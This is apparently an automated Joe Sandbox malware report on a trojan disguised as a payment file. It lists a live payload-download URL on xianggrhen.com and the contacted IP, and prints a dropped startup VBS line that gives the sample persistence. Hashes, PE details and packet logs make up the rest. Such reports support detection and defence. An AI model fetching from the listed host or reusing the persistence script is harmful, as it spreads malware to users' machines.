https://stackoverflow.com/q/14436606/23354	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp, LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.0000000003247000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	false		high
https://stackoverflow.com/q/11564914/23354;	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	false		high
https://github.com/mgravell/protobuf-net	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	false		high
http://xianggrhen.com	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://xianggrhen.com/composure/Vuglyxyuvio.pdfKaUX7OltiTRaxCtDq7h.igiywGRJl7xqn4AVJn	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.9.191.182	xianggrhen.com	Germany		47583	AS-HOSTINGERLT	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572322
Start date and time:	2024-12-10 13:10:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Detection:	MAL
Classification:	mal100.expl.evad.winEXE@4/3@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 89% Number of executed functions: 191 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, PID 8060 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Simulations

Behavior and APIs

Time	Type	Description
12:11:26	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4kvideodownloaderplus.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.9.191.182	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Get hash	malicious	Unknown	Browse	xianggrhen.com/camp/Reibbfkkyy.dat
45.9.191.182	DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exe	Get hash	malicious	Unknown	Browse	xianggrhen.com/desk/Tbddfcris.vdf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xianggrhen.com	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	AMTR-TT4781-SWFT-U4Y81-SO39-C37AR-AO937-CNR742-S3782-2818DY-9A82.exe	Get hash	malicious	Unknown	Browse	92.113.29.113

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-HOSTINGERLT	Employee_Letter.pdf	Get hash	malicious	HTMLPhisher	Browse	92.249.45.121
	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	https://application-workspace.com/red-bull/id-38772	Get hash	malicious	Unknown	Browse	45.84.207.234
	https://clickme.thryv.com/ls/click?upn=u001.5-2B1Zlj-2BwCegXqgd6Um7kY0JRT8UgUE3u1rWR4YFASxlUU28BkvglW4Sw74FAirirfRSk_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQjRRfcuGnHeO06MZmpQ9Md6EqF3tHpTnJtwnRl07eBC-2BbeqGDZkqEsFQ9fh8CwKb92GLRs9xjA4K3L0qiP8u-2BrdM8wHoplpWV7e4Ic88yYySdEC6BFxZgKH7uN8ysaI5ELMcoW165-2BlUHwvAK7b88Y-2FPYUokK9PeBa-2FcZkvlS9nh3pVTeDrVNhWWvISMX1rFpeltySyG2xWyMwf0YLv9gS0X1AE0s7oDERqOcaTwfLsXQxoV99DX1bVNLU7d5FQCgc-3D#C?email=heath.teresa@aidb.org	Get hash	malicious	Unknown	Browse	31.170.162.164
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	46.17.173.161
	http://nemoinsure.com	Get hash	malicious	Unknown	Browse	195.110.59.5
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	31.170.162.164
	I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg	Get hash	malicious	Mint Stealer	Browse	195.110.59.166
	https://kunnskapsfilm.no	Get hash	malicious	Unknown	Browse	45.93.125.64

Process:	C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	189120
Entropy (8bit):	3.981426412578346
Encrypted:	false
SSDEEP:	1536:NPwIXot/70O6Wbfe8JBG6YmRyVYq7Sq7c5:NPW7tjjJBG6vRyV5h7c5
MD5:	013270D9FD4600004204ED3BA5897636
SHA1:	76E2DDF727114B64A9DA2ABDAF65F4A25896AA5E
SHA-256:	5FC01C554F92EBAAAEBF46729CD04D0561703D7DD39D20027DAB2A9F8DF4D52A
SHA-512:	1B69CA956BBBE180164F0E6A65521B6C96A13088AB926400B4DC8227D68B73DCEBB470F8FF3276BB7C907689A8C7940BC485FB8663171D2C95E6ED7DD2ADC2FB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.Xg.............................,... ...@....@.. ....................... ............`.................................d,..J....@............................................................................. ............... ..H............text........ ...................... ..`.rsrc.......@......................@..@.reloc..............................@..B.................,......H........!..............................................................Br...p+.&(....+.....0..........8....8....+hr...p8d...8i...8n...rG..p8j...8o....-..-.8n...o.......+..s....ra..p(......-..,...&...-..,......io......D.8....(....8....o....8.....8....(....8....o....8.....8.....,..o......s....8A....8@...........E..]..................b+.+.+.(....+..+.o....+....r+.+.+.(....+.(....+.o....+..........+.r...p+.+.+.+.+ (....+.(....+..+.(....+.(...++.o....+.....(....*BSJB........

C:\Users\user\AppData\Local\4kvideodownloaderplus.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4kvideodownloaderplus.vbs

Download File

Process:	C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.802701693642799
Encrypted:	false
SSDEEP:	3:FER/n0eFHHot+kiE2J5ROXEKdXV6dkHn:FER/lFHIwkn23SDH
MD5:	5953585C2A2076983E9EE70CE62AAB2A
SHA1:	75CCE75DAB9FADD380B47CA84F07505828BB0ED4
SHA-256:	0CC8A91B5A1199DF6854BA1E01D58F9888DE064BBE192568100736BF75DA35AE
SHA-512:	276EE6893F92FBB102C7C489FA9FE30BDC86C5EE6A3F37ACD46E2A7A801EB4CEE85EF5026237C83DEB7C28C1060BA0F71C4832EC36E0B588A457B5DA154E2F19
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\4kvideodownloaderplus.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.981426412578346
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
File size:	189'120 bytes
MD5:	013270d9fd4600004204ed3ba5897636
SHA1:	76e2ddf727114b64a9da2abdaf65f4a25896aa5e
SHA256:	5fc01c554f92ebaaaebf46729cd04d0561703d7dd39d20027dab2a9f8df4d52a
SHA512:	1b69ca956bbbe180164f0e6a65521b6c96a13088ab926400b4dc8227d68b73dcebb470f8ff3276bb7c907689a8c7940bc485fb8663171d2c95e6ed7dd2adc2fb
SSDEEP:	1536:NPwIXot/70O6Wbfe8JBG6YmRyVYq7Sq7c5:NPW7tjjJBG6vRyV5h7c5
TLSH:	3D04B292B62799CDCD5274B58A528C1504E1ED70B8B88DE63A027B4DBCFF1D87D8DC0A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.Xg.............................,... ...@....@.. ....................... ............`................................

File Icon


Icon Hash:	0109ca1a736c94a3

Static PE Info

General

Entrypoint:	0x402cae
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67580564 [Tue Dec 10 09:09:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	19/01/2022 19:00:00 17/01/2025 18:59:59
Subject Chain	CN=Open Media LLC, O=Open Media LLC, L=Nizhny Novgorod, S=Nizhny Novgorod Oblast, C=RU
Version:	3
Thumbprint MD5:	205A98B2BD23ECF13C1B208B3A6BEC94
Thumbprint SHA-1:	AABF04171F576AA0388C51D0EB7BDB8D9982B97D
Thumbprint SHA-256:	7263A8866F2FD9646C9650812F918331738A902CD9C6B2885F47F1DA1D7F619D
Serial:	06E26320848D2C32D8CCAFF3A6C1F2D9

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2c64	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x2a4d9	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2b800	0x2ac0	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x30000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcb4	0xe00	90b2bb26359bc3fe8bbba47e0cc73e90	False	0.5345982142857143	OpenPGP Secret Key	5.047042741709069	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x2a4d9	0x2a600	27702734f1c30fb6bf39c3ab3d8084eb	False	0.13331374446902655	data	3.5553843913281127	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x30000	0xc	0x200	a4212e740029a1f00034aac5d326b34a	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x40ac	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m	0.41932624113475175
RT_ICON	0x4538	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m	0.26885245901639343
RT_ICON	0x4ee4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m	0.1848030018761726
RT_ICON	0x5fb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m	0.12271784232365145
RT_ICON	0x857c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m	0.0918162494095418
RT_ICON	0xc7c8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m	0.08230129390018484
RT_ICON	0x11c74	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m	0.0700809333613622
RT_ICON	0x1b140	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m	0.05779013368035017
RT_ICON	0x2b98c	0x2461	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9741221947814882
RT_GROUP_ICON	0x2de29	0x84	data	0.7196969696969697
RT_VERSION	0x2dee9	0x3ca	data	0.4020618556701031
RT_MANIFEST	0x2e2ef	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 13:10:56.128762007 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:56.248599052 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:56.248684883 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:56.249774933 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:56.369055986 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.494647026 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.494946003 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.495002031 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.495059013 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.495071888 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.495083094 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.495106936 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.495224953 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.495238066 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.495249987 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.495265961 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.495265961 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.495280981 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.495284081 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.495328903 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.614306927 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.614370108 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.614417076 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.618524075 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.664752007 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.687150002 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.687182903 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.687232971 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.691498995 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.691660881 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.691706896 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.699950933 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.700186014 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.700237989 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.707756996 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.707802057 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.707849026 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.716344118 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.716474056 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.716514111 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.724463940 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.724637032 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.724677086 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.732914925 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.733486891 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.733539104 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.741410017 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.741424084 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.741466999 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.749701977 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.749713898 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.749762058 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.758148909 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.758183002 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.758236885 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.784189939 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.784266949 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.784337997 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.788923979 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.836746931 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.879302979 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.879386902 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.879461050 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.881738901 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.881818056 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.881866932 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.886460066 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.886476994 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.886533976 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.891295910 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.891308069 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.891366005 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.896234035 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.896245956 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.896298885 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.900825024 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.900836945 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.900902033 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.905965090 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.906092882 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.906137943 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.910662889 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.911180019 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.911227942 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.915251970 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.915493965 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.915559053 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.920171022 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.920344114 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.920394897 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.924803019 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.924879074 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.924917936 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.930737972 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.930752039 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.930816889 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.935404062 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.935559988 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.935627937 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:57.940601110 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.940720081 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:57.940789938 CET	49735	80	192.168.2.4	45.9.191.182
